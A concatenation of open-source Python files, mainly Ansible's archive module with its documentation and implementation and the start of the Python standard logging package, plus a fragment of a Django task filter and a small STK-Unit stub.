for u in User.objects.exclude(id=user.id):
assignee.append((u.id, str(u)))
my_projects = Project.objects.filter(member_users=user).order_by("name")
projects.append(('','Your Projects'))
for project in my_projects:
projects.append((project.id,
SafeString(' ' + project.name)))
projects.append(('','Other Projects'))
for project in Project.objects.exclude(id__in=my_projects):
projects.append((project.id,
SafeString(' ' + project.name)))
else:
projects.append(('','All Projects'))
for project in Project.objects.all():
projects.append((project.id,
SafeString(' ' + project.name)))
for u in User.objects.all():
assignee.append((u.id, str(u)))
object_id = filters.MultipleChoiceFilter(
# choices = tuple([(p.id, p.name) for p in Project.objects.all()]),
name='object_id',
choices = tuple(projects),
widget = forms.SelectMultiple,
label='Project'
)
self.filters['object_id'] = object_id
assignee = filters.MultipleChoiceFilter(
# choices = tuple([(p.id, p.name) for p in Project.objects.all()]),
name='assignee',
choices = tuple(assignee),
widget = forms.SelectMultiple,
label='Assignee'
)
self.filters['assignee'] = assignee
class Meta:
model = Task
fields = ["state", "milestone", "object_id", "assignee"]
| hbussell/pinax-tracker | apps/tasks/filters.py | Python | mit | 4,235 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2016, Ben Doherty <bendohmv@gmail.com>
# Sponsored by Oomph, Inc. http://www.oomphinc.com
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: archive
version_added: '2.3'
short_description: Creates a compressed archive of one or more files or trees
extends_documentation_fragment: files
description:
- Packs an archive.
- It is the opposite of M(unarchive).
- By default, it assumes the compression source exists on the target.
- It will not copy the source file from the local system to the target before archiving.
- Source files can be deleted after archival by specifying I(remove=True).
options:
path:
description:
- Remote absolute path, glob, or list of paths or globs for the file or files to compress or archive.
type: list
required: true
format:
description:
- The type of compression to use.
- Support for xz was added in Ansible 2.5.
type: str
choices: [ bz2, gz, tar, xz, zip ]
default: gz
dest:
description:
- The file name of the destination archive.
- This is required when C(path) refers to multiple files by either specifying a glob, a directory or multiple paths in a list.
type: path
exclude_path:
description:
- Remote absolute path, glob, or list of paths or globs for the file or files to exclude from the archive.
type: list
version_added: '2.4'
force_archive:
version_added: '2.8'
description:
- Allow you to force the module to treat this as an archive even if only a single file is specified.
- By default behaviour is maintained. i.e A when a single file is specified it is compressed only (not archived).
type: bool
default: false
remove:
description:
- Remove any added source files and trees after adding to archive.
type: bool
default: no
notes:
- Requires tarfile, zipfile, gzip and bzip2 packages on target host.
- Requires lzma or backports.lzma if using xz format.
- Can produce I(gzip), I(bzip2), I(lzma) and I(zip) compressed files or archives.
seealso:
- module: unarchive
author:
- Ben Doherty (@bendoh)
'''
EXAMPLES = r'''
- name: Compress directory /path/to/foo/ into /path/to/foo.tgz
archive:
path: /path/to/foo
dest: /path/to/foo.tgz
- name: Compress regular file /path/to/foo into /path/to/foo.gz and remove it
archive:
path: /path/to/foo
remove: yes
- name: Create a zip archive of /path/to/foo
archive:
path: /path/to/foo
format: zip
- name: Create a bz2 archive of multiple files, rooted at /path
archive:
path:
- /path/to/foo
- /path/wong/foo
dest: /path/file.tar.bz2
format: bz2
- name: Create a bz2 archive of a globbed path, while excluding specific dirnames
archive:
path:
- /path/to/foo/*
dest: /path/file.tar.bz2
exclude_path:
- /path/to/foo/bar
- /path/to/foo/baz
format: bz2
- name: Create a bz2 archive of a globbed path, while excluding a glob of dirnames
archive:
path:
- /path/to/foo/*
dest: /path/file.tar.bz2
exclude_path:
- /path/to/foo/ba*
format: bz2
- name: Use gzip to compress a single archive (i.e don't archive it first with tar)
archive:
path: /path/to/foo/single.file
dest: /path/file.gz
format: gz
- name: Create a tar.gz archive of a single file.
archive:
path: /path/to/foo/single.file
dest: /path/file.tar.gz
format: gz
force_archive: true
'''
RETURN = r'''
state:
description:
The current state of the archived file.
If 'absent', then no source files were found and the archive does not exist.
If 'compress', then the file source file is in the compressed state.
If 'archive', then the source file or paths are currently archived.
If 'incomplete', then an archive was created, but not all source paths were found.
type: str
returned: always
missing:
description: Any files that were missing from the source.
type: list
returned: success
archived:
description: Any files that were compressed or added to the archive.
type: list
returned: success
arcroot:
description: The archive root.
type: str
returned: always
expanded_paths:
description: The list of matching paths from paths argument.
type: list
returned: always
expanded_exclude_paths:
description: The list of matching exclude paths from the exclude_path argument.
type: list
returned: always
'''
import bz2
import filecmp
import glob
import gzip
import io
import os
import re
import shutil
import tarfile
import zipfile
from traceback import format_exc
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from ansible.module_utils._text import to_bytes, to_native
from ansible.module_utils.six import PY3
LZMA_IMP_ERR = None
if PY3:
try:
import lzma
HAS_LZMA = True
except ImportError:
LZMA_IMP_ERR = format_exc()
HAS_LZMA = False
else:
try:
from backports import lzma
HAS_LZMA = True
except ImportError:
LZMA_IMP_ERR = format_exc()
HAS_LZMA = False
def main():
module = AnsibleModule(
argument_spec=dict(
path=dict(type='list', required=True),
format=dict(type='str', default='gz', choices=['bz2', 'gz', 'tar', 'xz', 'zip']),
dest=dict(type='path'),
exclude_path=dict(type='list'),
force_archive=dict(type='bool', default=False),
remove=dict(type='bool', default=False),
),
add_file_common_args=True,
supports_check_mode=True,
)
params = module.params
check_mode = module.check_mode
paths = params['path']
dest = params['dest']
b_dest = None if not dest else to_bytes(dest, errors='surrogate_or_strict')
exclude_paths = params['exclude_path']
remove = params['remove']
b_expanded_paths = []
b_expanded_exclude_paths = []
fmt = params['format']
b_fmt = to_bytes(fmt, errors='surrogate_or_strict')
force_archive = params['force_archive']
globby = False
changed = False
state = 'absent'
# Simple or archive file compression (inapplicable with 'zip' since it's always an archive)
archive = False
b_successes = []
# Fail early
if not HAS_LZMA and fmt == 'xz':
module.fail_json(msg=missing_required_lib("lzma or backports.lzma", reason="when using xz format"),
exception=LZMA_IMP_ERR)
module.fail_json(msg="lzma or backports.lzma is required when using xz format.")
for path in paths:
b_path = os.path.expanduser(
os.path.expandvars(
to_bytes(path, errors='surrogate_or_strict')
)
)
# Expand any glob characters. If found, add the expanded glob to the
# list of expanded_paths, which might be empty.
if (b'*' in b_path or b'?' in b_path):
b_expanded_paths.extend(glob.glob(b_path))
globby = True
# If there are no glob characters the path is added to the expanded paths
# whether the path exists or not
else:
b_expanded_paths.append(b_path)
# Only attempt to expand the exclude paths if it exists
if exclude_paths:
for exclude_path in exclude_paths:
b_exclude_path = os.path.expanduser(
os.path.expandvars(
to_bytes(exclude_path, errors='surrogate_or_strict')
)
)
# Expand any glob characters. If found, add the expanded glob to the
# list of expanded_paths, which might be empty.
if (b'*' in b_exclude_path or b'?' in b_exclude_path):
b_expanded_exclude_paths.extend(glob.glob(b_exclude_path))
# If there are no glob character the exclude path is added to the expanded
# exclude paths whether the path exists or not.
else:
b_expanded_exclude_paths.append(b_exclude_path)
if not b_expanded_paths:
return module.fail_json(
path=', '.join(paths),
expanded_paths=to_native(b', '.join(b_expanded_paths), errors='surrogate_or_strict'),
msg='Error, no source paths were found'
)
# Only try to determine if we are working with an archive or not if we haven't set archive to true
if not force_archive:
# If we actually matched multiple files or TRIED to, then
# treat this as a multi-file archive
archive = globby or os.path.isdir(b_expanded_paths[0]) or len(b_expanded_paths) > 1
else:
archive = True
# Default created file name (for single-file archives) to
# <file>.<format>
if not b_dest and not archive:
b_dest = b'%s.%s' % (b_expanded_paths[0], b_fmt)
# Force archives to specify 'dest'
if archive and not b_dest:
module.fail_json(dest=dest, path=', '.join(paths), msg='Error, must specify "dest" when archiving multiple files or trees')
b_sep = to_bytes(os.sep, errors='surrogate_or_strict')
b_archive_paths = []
b_missing = []
b_arcroot = b''
for b_path in b_expanded_paths:
# Use the longest common directory name among all the files
# as the archive root path
if b_arcroot == b'':
b_arcroot = os.path.dirname(b_path) + b_sep
else:
for i in range(len(b_arcroot)):
if b_path[i] != b_arcroot[i]:
break
if i < len(b_arcroot):
b_arcroot = os.path.dirname(b_arcroot[0:i + 1])
b_arcroot += b_sep
# Don't allow archives to be created anywhere within paths to be removed
if remove and os.path.isdir(b_path):
b_path_dir = b_path
if not b_path.endswith(b'/'):
b_path_dir += b'/'
if b_dest.startswith(b_path_dir):
module.fail_json(
path=', '.join(paths),
msg='Error, created archive can not be contained in source paths when remove=True'
)
if os.path.lexists(b_path) and b_path not in b_expanded_exclude_paths:
b_archive_paths.append(b_path)
else:
b_missing.append(b_path)
# No source files were found but the named archive exists: are we 'compress' or 'archive' now?
if len(b_missing) == len(b_expanded_paths) and b_dest and os.path.exists(b_dest):
# Just check the filename to know if it's an archive or simple compressed file
if re.search(br'(\.tar|\.tar\.gz|\.tgz|\.tbz2|\.tar\.bz2|\.tar\.xz|\.zip)$', os.path.basename(b_dest), re.IGNORECASE):
state = 'archive'
else:
state = 'compress'
# Multiple files, or globbiness
elif archive:
if not b_archive_paths:
# No source files were found, but the archive is there.
if os.path.lexists(b_dest):
state = 'archive'
elif b_missing:
# SOME source files were found, but not all of them
state = 'incomplete'
archive = None
size = 0
errors = []
if os.path.lexists(b_dest):
size = os.path.getsize(b_dest)
if state != 'archive':
if check_mode:
changed = True
else:
try:
# Slightly more difficult (and less efficient!) compression using zipfile module
if fmt == 'zip':
arcfile = zipfile.ZipFile(
to_native(b_dest, errors='surrogate_or_strict', encoding='ascii'),
'w',
zipfile.ZIP_DEFLATED,
True
)
# Easier compression using tarfile module
elif fmt == 'gz' or fmt == 'bz2':
arcfile = tarfile.open(to_native(b_dest, errors='surrogate_or_strict', encoding='ascii'), 'w|' + fmt)
# python3 tarfile module allows xz format but for python2 we have to create the tarfile
# in memory and then compress it with lzma.
elif fmt == 'xz':
arcfileIO = io.BytesIO()
arcfile = tarfile.open(fileobj=arcfileIO, mode='w')
# Or plain tar archiving
elif fmt == 'tar':
arcfile = tarfile.open(to_native(b_dest, errors='surrogate_or_strict', encoding='ascii'), 'w')
b_match_root = re.compile(br'^%s' % re.escape(b_arcroot))
for b_path in b_archive_paths:
if os.path.isdir(b_path):
# Recurse into directories
for b_dirpath, b_dirnames, b_filenames in os.walk(b_path, topdown=True):
if not b_dirpath.endswith(b_sep):
b_dirpath += b_sep
for b_dirname in b_dirnames:
b_fullpath = b_dirpath + b_dirname
n_fullpath = to_native(b_fullpath, errors='surrogate_or_strict', encoding='ascii')
n_arcname = to_native(b_match_root.sub(b'', b_fullpath), errors='surrogate_or_strict')
try:
if fmt == 'zip':
arcfile.write(n_fullpath, n_arcname)
else:
arcfile.add(n_fullpath, n_arcname, recursive=False)
except Exception as e:
errors.append('%s: %s' % (n_fullpath, to_native(e)))
for b_filename in b_filenames:
b_fullpath = b_dirpath + b_filename
n_fullpath = to_native(b_fullpath, errors='surrogate_or_strict', encoding='ascii')
n_arcname = to_native(b_match_root.sub(b'', b_fullpath), errors='surrogate_or_strict')
try:
if fmt == 'zip':
arcfile.write(n_fullpath, n_arcname)
else:
arcfile.add(n_fullpath, n_arcname, recursive=False)
b_successes.append(b_fullpath)
except Exception as e:
errors.append('Adding %s: %s' % (to_native(b_path), to_native(e)))
else:
path = to_native(b_path, errors='surrogate_or_strict', encoding='ascii')
arcname = to_native(b_match_root.sub(b'', b_path), errors='surrogate_or_strict')
if fmt == 'zip':
arcfile.write(path, arcname)
else:
arcfile.add(path, arcname, recursive=False)
b_successes.append(b_path)
except Exception as e:
expanded_fmt = 'zip' if fmt == 'zip' else ('tar.' + fmt)
module.fail_json(
msg='Error when writing %s archive at %s: %s' % (expanded_fmt, dest, to_native(e)),
exception=format_exc()
)
if arcfile:
arcfile.close()
state = 'archive'
if fmt == 'xz':
with lzma.open(b_dest, 'wb') as f:
f.write(arcfileIO.getvalue())
arcfileIO.close()
if errors:
module.fail_json(msg='Errors when writing archive at %s: %s' % (dest, '; '.join(errors)))
if state in ['archive', 'incomplete'] and remove:
for b_path in b_successes:
try:
if os.path.isdir(b_path):
shutil.rmtree(b_path)
elif not check_mode:
os.remove(b_path)
except OSError as e:
errors.append(to_native(b_path))
if errors:
module.fail_json(dest=dest, msg='Error deleting some source files: ', files=errors)
# Rudimentary check: If size changed then file changed. Not perfect, but easy.
if not check_mode and os.path.getsize(b_dest) != size:
changed = True
if b_successes and state != 'incomplete':
state = 'archive'
# Simple, single-file compression
else:
b_path = b_expanded_paths[0]
# No source or compressed file
if not (os.path.exists(b_path) or os.path.lexists(b_dest)):
state = 'absent'
# if it already exists and the source file isn't there, consider this done
elif not os.path.lexists(b_path) and os.path.lexists(b_dest):
state = 'compress'
else:
if module.check_mode:
if not os.path.exists(b_dest):
changed = True
else:
size = 0
f_in = f_out = arcfile = None
if os.path.lexists(b_dest):
size = os.path.getsize(b_dest)
try:
if fmt == 'zip':
arcfile = zipfile.ZipFile(
to_native(b_dest, errors='surrogate_or_strict', encoding='ascii'),
'w',
zipfile.ZIP_DEFLATED,
True
)
arcfile.write(
to_native(b_path, errors='surrogate_or_strict', encoding='ascii'),
to_native(b_path[len(b_arcroot):], errors='surrogate_or_strict')
)
arcfile.close()
state = 'archive' # because all zip files are archives
elif fmt == 'tar':
arcfile = tarfile.open(to_native(b_dest, errors='surrogate_or_strict', encoding='ascii'), 'w')
arcfile.add(to_native(b_path, errors='surrogate_or_strict', encoding='ascii'))
arcfile.close()
else:
f_in = open(b_path, 'rb')
n_dest = to_native(b_dest, errors='surrogate_or_strict', encoding='ascii')
if fmt == 'gz':
f_out = gzip.open(n_dest, 'wb')
elif fmt == 'bz2':
f_out = bz2.BZ2File(n_dest, 'wb')
elif fmt == 'xz':
f_out = lzma.LZMAFile(n_dest, 'wb')
else:
raise OSError("Invalid format")
shutil.copyfileobj(f_in, f_out)
b_successes.append(b_path)
except OSError as e:
module.fail_json(
path=to_native(b_path),
dest=dest,
msg='Unable to write to compressed file: %s' % to_native(e), exception=format_exc()
)
if arcfile:
arcfile.close()
if f_in:
f_in.close()
if f_out:
f_out.close()
# Rudimentary check: If size changed then file changed. Not perfect, but easy.
if os.path.getsize(b_dest) != size:
changed = True
state = 'compress'
if remove and not check_mode:
try:
os.remove(b_path)
except OSError as e:
module.fail_json(
path=to_native(b_path),
msg='Unable to remove source file: %s' % to_native(e), exception=format_exc()
)
params['path'] = b_dest
file_args = module.load_file_common_arguments(params)
if not check_mode:
changed = module.set_fs_attributes_if_different(file_args, changed)
module.exit_json(
archived=[to_native(p, errors='surrogate_or_strict') for p in b_successes],
dest=dest,
changed=changed,
state=state,
arcroot=to_native(b_arcroot, errors='surrogate_or_strict'),
missing=[to_native(p, errors='surrogate_or_strict') for p in b_missing],
expanded_paths=[to_native(p, errors='surrogate_or_strict') for p in b_expanded_paths],
expanded_exclude_paths=[to_native(p, errors='surrogate_or_strict') for p in b_expanded_exclude_paths],
)
if __name__ == '__main__':
main()
| 2ndQuadrant/ansible | lib/ansible/modules/files/archive.py | Python | gpl-3.0 | 21,483 |
'''
STK-Unit Command line tool
Copyright (C) 2013 Giacomo Picchiarelli
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import dbcon
import sys
class stkLayer(object):
def __init__(self):
self.flag = "layer" | gpicchiarelli/mirror-stk | stkLayer.py | Python | agpl-3.0 | 860 |
# Copyright 2001-2009 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Logging package for Python. Based on PEP 282 and comments thereto in
comp.lang.python, and influenced by Apache's log4j system.
Copyright (C) 2001-2009 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging' and log away!
"""
import sys, os, time, io, traceback, warnings
__all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR',
'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO',
'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler',
'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig',
'captureWarnings', 'critical', 'debug', 'disable', 'error',
'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass',
'info', 'log', 'makeLogRecord', 'setLoggerClass', 'warn', 'warning']
try:
import codecs
except ImportError:
codecs = None
try:
import _thread as thread
import threading
except ImportError:
thread = None
__author__ = "Vinay Sajip <vinay_sajip@red-dove.com>"
__status__ = "production"
__version__ = "0.5.0.7"
__date__ = "20 January 2009"
#---------------------------------------------------------------------------
# Miscellaneous module data
#---------------------------------------------------------------------------
_unicode = 'unicode' in dir(__builtins__)
#
# _srcfile is used when walking the stack to check when we've got the first
# caller stack frame.
#
if hasattr(sys, 'frozen'): #support for py2exe
_srcfile = "logging%s__init__%s" % (os.sep, __file__[-4:])
elif __file__[-4:].lower() in ['.pyc', '.pyo']:
_srcfile = __file__[:-4] + '.py'
else:
_srcfile = __file__
_srcfile = os.path.normcase(_srcfile)
# next bit filched from 1.5.2's inspect.py
def currentframe():
"""Return the frame object for the caller's stack frame."""
try:
raise Exception
except:
return sys.exc_info()[2].tb_frame.f_back
if hasattr(sys, '_getframe'): currentframe = lambda: sys._getframe(3)
# done filching
# _srcfile is only used in conjunction with sys._getframe().
# To provide compatibility with older versions of Python, set _srcfile
# to None if _getframe() is not available; this value will prevent
# findCaller() from being called.
#if not hasattr(sys, "_getframe"):
# _srcfile = None
#
#_startTime is used as the base when calculating the relative time of events
#
_startTime = time.time()
#
#raiseExceptions is used to see if exceptions during handling should be
#propagated
#
raiseExceptions = 1
#
# If you don't want threading information in the log, set this to zero
#
logThreads = 1
#
# If you don't want multiprocessing information in the log, set this to zero
#
logMultiprocessing = 1
#
# If you don't want process information in the log, set this to zero
#
logProcesses = 1
#---------------------------------------------------------------------------
# Level related stuff
#---------------------------------------------------------------------------
#
# Default levels and level names, these can be replaced with any positive set
# of values having corresponding names. There is a pseudo-level, NOTSET, which
# is only really there as a lower limit for user-defined levels. Handlers and
# loggers are initialized with NOTSET so that they will log all messages, even
# at user-defined levels.
#
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0
_levelNames = {
CRITICAL : 'CRITICAL',
ERROR : 'ERROR',
WARNING : 'WARNING',
INFO : 'INFO',
DEBUG : 'DEBUG',
NOTSET : 'NOTSET',
'CRITICAL' : CRITICAL,
'ERROR' : ERROR,
'WARN' : WARNING,
'WARNING' : WARNING,
'INFO' : INFO,
'DEBUG' : DEBUG,
'NOTSET' : NOTSET,
}
def getLevelName(level):
"""
Return the textual representation of logging level 'level'.
If the level is one of the predefined levels (CRITICAL, ERROR, WARNING,
INFO, DEBUG) then you get the corresponding string. If you have
associated levels with names using addLevelName then the name you have
associated with 'level' is returned.
If a numeric value corresponding to one of the defined levels is passed
in, the corresponding string representation is returned.
Otherwise, the string "Level %s" % level is returned.
"""
return _levelNames.get(level, ("Level %s" % level))
def addLevelName(level, levelName):
"""
Associate 'levelName' with 'level'.
This is used when converting levels to text during message formatting.
"""
_acquireLock()
try: #unlikely to cause an exception, but you never know...
_levelNames[level] = levelName
_levelNames[levelName] = level
finally:
_releaseLock()
#---------------------------------------------------------------------------
# Thread-related stuff
#---------------------------------------------------------------------------
#
#_lock is used to serialize access to shared data structures in this module.
#This needs to be an RLock because fileConfig() creates Handlers and so
#might arbitrary user threads. Since Handler.__init__() updates the shared
#dictionary _handlers, it needs to acquire the lock. But if configuring,
#the lock would already have been acquired - so we need an RLock.
#The same argument applies to Loggers and Manager.loggerDict.
#
_lock = None
def _acquireLock():
"""
Acquire the module-level lock for serializing access to shared data.
This should be released with _releaseLock().
"""
global _lock
if (not _lock) and thread:
_lock = threading.RLock()
if _lock:
_lock.acquire()
def _releaseLock():
"""
Release the module-level lock acquired by calling _acquireLock().
"""
if _lock:
_lock.release()
#---------------------------------------------------------------------------
# The logging record
#---------------------------------------------------------------------------
class LogRecord:
"""
A LogRecord instance represents an event being logged.
LogRecord instances are created every time something is logged. They
contain all the information pertinent to the event being logged. The
main information passed in is in msg and args, which are combined
using str(msg) % args to create the message field of the record. The
record also includes information such as when the record was created,
the source line where the logging call was made, and any exception
information to be logged.
"""
def __init__(self, name, level, pathname, lineno,
msg, args, exc_info, func=None):
"""
Initialize a logging record with interesting information.
"""
ct = time.time()
self.name = name
self.msg = msg
#
# The following statement allows passing of a dictionary as a sole
# argument, so that you can do something like
# logging.debug("a %(a)d b %(b)s", {'a':1, 'b':2})
# Suggested by Stefan Behnel.
# Note that without the test for args[0], we get a problem because
# during formatting, we test to see if the arg is present using
# 'if self.args:'. If the event being logged is e.g. 'Value is %d'
# and if the passed arg fails 'if self.args:' then no formatting
# is done. For example, logger.warn('Value is %d', 0) would log
# 'Value is %d' instead of 'Value is 0'.
# For the use case of passing a dictionary, this should not be a
# problem.
if args and len(args) == 1 and isinstance(args[0], dict) and args[0]:
args = args[0]
self.args = args
self.levelname = getLevelName(level)
self.levelno = level
self.pathname = pathname
try:
self.filename = os.path.basename(pathname)
self.module = os.path.splitext(self.filename)[0]
except (TypeError, ValueError, AttributeError):
self.filename = pathname
self.module = "Unknown module"
self.exc_info = exc_info
self.exc_text = None # used to cache the traceback text
self.lineno = lineno
self.funcName = func
self.created = ct
self.msecs = (ct - int(ct)) * 1000
self.relativeCreated = (self.created - _startTime) * 1000
if logThreads and thread:
self.thread = thread.get_ident()
self.threadName = threading.current_thread().name
else:
self.thread = None
self.threadName = None
if logMultiprocessing:
from multiprocessing import current_process
self.processName = current_process().name
else:
self.processName = None
if logProcesses and hasattr(os, 'getpid'):
self.process = os.getpid()
else:
self.process = None
def __str__(self):
return '<LogRecord: %s, %s, %s, %s, "%s">'%(self.name, self.levelno,
self.pathname, self.lineno, self.msg)
def getMessage(self):
"""
Return the message for this LogRecord.
Return the message for this LogRecord after merging any user-supplied
arguments with the message.
"""
if not _unicode: #if no unicode support...
msg = str(self.msg)
else:
msg = self.msg
if not isinstance(msg, str):
try:
msg = str(self.msg)
except UnicodeError:
msg = self.msg #Defer encoding till later
if self.args:
msg = msg % self.args
return msg
def makeLogRecord(dict):
"""
Make a LogRecord whose attributes are defined by the specified dictionary,
This function is useful for converting a logging event received over
a socket connection (which is sent as a dictionary) into a LogRecord
instance.
"""
rv = LogRecord(None, None, "", 0, "", (), None, None)
rv.__dict__.update(dict)
return rv
#---------------------------------------------------------------------------
# Formatter classes and functions
#---------------------------------------------------------------------------
class Formatter:
"""
Formatter instances are used to convert a LogRecord to text.
Formatters need to know how a LogRecord is constructed. They are
responsible for converting a LogRecord to (usually) a string which can
be interpreted by either a human or an external system. The base Formatter
allows a formatting string to be specified. If none is supplied, the
default value of "%s(message)\\n" is used.
The Formatter can be initialized with a format string which makes use of
knowledge of the LogRecord attributes - e.g. the default value mentioned
above makes use of the fact that the user's message and arguments are pre-
formatted into a LogRecord's message attribute. Currently, the useful
attributes in a LogRecord are described by:
%(name)s Name of the logger (logging channel)
%(levelno)s Numeric logging level for the message (DEBUG, INFO,
WARNING, ERROR, CRITICAL)
%(levelname)s Text logging level for the message ("DEBUG", "INFO",
"WARNING", "ERROR", "CRITICAL")
%(pathname)s Full pathname of the source file where the logging
call was issued (if available)
%(filename)s Filename portion of pathname
%(module)s Module (name portion of filename)
%(lineno)d Source line number where the logging call was issued
(if available)
%(funcName)s Function name
%(created)f Time when the LogRecord was created (time.time()
return value)
%(asctime)s Textual time when the LogRecord was created
%(msecs)d Millisecond portion of the creation time
%(relativeCreated)d Time in milliseconds when the LogRecord was created,
relative to the time the logging module was loaded
(typically at application startup time)
%(thread)d Thread ID (if available)
%(threadName)s Thread name (if available)
%(process)d Process ID (if available)
%(message)s The result of record.getMessage(), computed just as
the record is emitted
"""
converter = time.localtime
def __init__(self, fmt=None, datefmt=None):
"""
Initialize the formatter with specified format strings.
Initialize the formatter either with the specified format string, or a
default as described above. Allow for specialized date formatting with
the optional datefmt argument (if omitted, you get the ISO8601 format).
"""
if fmt:
self._fmt = fmt
else:
self._fmt = "%(message)s"
self.datefmt = datefmt
def formatTime(self, record, datefmt=None):
"""
Return the creation time of the specified LogRecord as formatted text.
This method should be called from format() by a formatter which
wants to make use of a formatted time. This method can be overridden
in formatters to provide for any specific requirement, but the
basic behaviour is as follows: if datefmt (a string) is specified,
it is used with time.strftime() to format the creation time of the
record. Otherwise, the ISO8601 format is used. The resulting
string is returned. This function uses a user-configurable function
to convert the creation time to a tuple. By default, time.localtime()
is used; to change this for a particular formatter instance, set the
'converter' attribute to a function with the same signature as
time.localtime() or time.gmtime(). To change it for all formatters,
for example if you want all logging times to be shown in GMT,
set the 'converter' attribute in the Formatter class.
"""
ct = self.converter(record.created)
if datefmt:
s = time.strftime(datefmt, ct)
else:
t = time.strftime("%Y-%m-%d %H:%M:%S", ct)
s = "%s,%03d" % (t, record.msecs)
return s
def formatException(self, ei):
"""
Format and return the specified exception information as a string.
This default implementation just uses
traceback.print_exception()
"""
sio = io.StringIO()
traceback.print_exception(ei[0], ei[1], ei[2], None, sio)
s = sio.getvalue()
sio.close()
if s[-1:] == "\n":
s = s[:-1]
return s
def format(self, record):
"""
Format the specified record as text.
The record's attribute dictionary is used as the operand to a
string formatting operation which yields the returned string.
Before formatting the dictionary, a couple of preparatory steps
are carried out. The message attribute of the record is computed
using LogRecord.getMessage(). If the formatting string contains
"%(asctime)", formatTime() is called to format the event time.
If there is exception information, it is formatted using
formatException() and appended to the message.
"""
record.message = record.getMessage()
if self._fmt.find("%(asctime)") >= 0:
record.asctime = self.formatTime(record, self.datefmt)
s = self._fmt % record.__dict__
if record.exc_info:
# Cache the traceback text to avoid converting it multiple times
# (it's constant anyway)
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
if s[-1:] != "\n":
s = s + "\n"
s = s + record.exc_text
return s
#
# The default formatter to use when no other is specified
#
_defaultFormatter = Formatter()
class BufferingFormatter:
"""
A formatter suitable for formatting a number of records.
"""
def __init__(self, linefmt=None):
"""
Optionally specify a formatter which will be used to format each
individual record.
"""
if linefmt:
self.linefmt = linefmt
else:
self.linefmt = _defaultFormatter
def formatHeader(self, records):
"""
Return the header string for the specified records.
"""
return ""
def formatFooter(self, records):
"""
Return the footer string for the specified records.
"""
return ""
def format(self, records):
"""
Format the specified records and return the result as a string.
"""
rv = ""
if len(records) > 0:
rv = rv + self.formatHeader(records)
for record in records:
rv = rv + self.linefmt.format(record)
rv = rv + self.formatFooter(records)
return rv
#---------------------------------------------------------------------------
# Filter classes and functions
#---------------------------------------------------------------------------
class Filter:
"""
Filter instances are used to perform arbitrary filtering of LogRecords.
Loggers and Handlers can optionally use Filter instances to filter
records as desired. The base filter class only allows events which are
below a certain point in the logger hierarchy. For example, a filter
initialized with "A.B" will allow events logged by loggers "A.B",
"A.B.C", "A.B.C.D", "A.B.D" etc. but not "A.BB", "B.A.B" etc. If
initialized with the empty string, all events are passed.
"""
def __init__(self, name=''):
"""
Initialize a filter.
Initialize with the name of the logger which, together with its
children, will have its events allowed through the filter. If no
name is specified, allow every event.
"""
self.name = name
self.nlen = len(name)
def filter(self, record):
"""
Determine if the specified record is to be logged.
Is the specified record to be logged? Returns 0 for no, nonzero for
yes. If deemed appropriate, the record may be modified in-place.
"""
if self.nlen == 0:
return 1
elif self.name == record.name:
return 1
elif record.name.find(self.name, 0, self.nlen) != 0:
return 0
return (record.name[self.nlen] == ".")
class Filterer:
"""
A base class for loggers and handlers which allows them to share
common code.
"""
def __init__(self):
"""
Initialize the list of filters to be an empty list.
"""
self.filters = []
def addFilter(self, filter):
"""
Add the specified filter to this handler.
"""
if not (filter in self.filters):
self.filters.append(filter)
def removeFilter(self, filter):
"""
Remove the specified filter from this handler.
"""
if filter in self.filters:
self.filters.remove(filter)
def filter(self, record):
"""
Determine if a record is loggable by consulting all the filters.
The default is to allow the record to be logged; any filter can veto
this and the record is then dropped. Returns a zero value if a record
is to be dropped, else non-zero.
"""
rv = 1
for f in self.filters:
if not f.filter(record):
rv = 0
break
return rv
#---------------------------------------------------------------------------
# Handler classes and functions
#---------------------------------------------------------------------------
_handlers = {} #repository of handlers (for flushing when shutdown called)
_handlerList = [] # added to allow handlers to be removed in reverse of order initialized
class Handler(Filterer):
"""
Handler instances dispatch logging events to specific destinations.
The base handler class. Acts as a placeholder which defines the Handler
interface. Handlers can optionally use Formatter instances to format
records as desired. By default, no formatter is specified; in this case,
the 'raw' message as determined by record.message is logged.
"""
def __init__(self, level=NOTSET):
"""
Initializes the instance - basically setting the formatter to None
and the filter list to empty.
"""
Filterer.__init__(self)
self.level = level
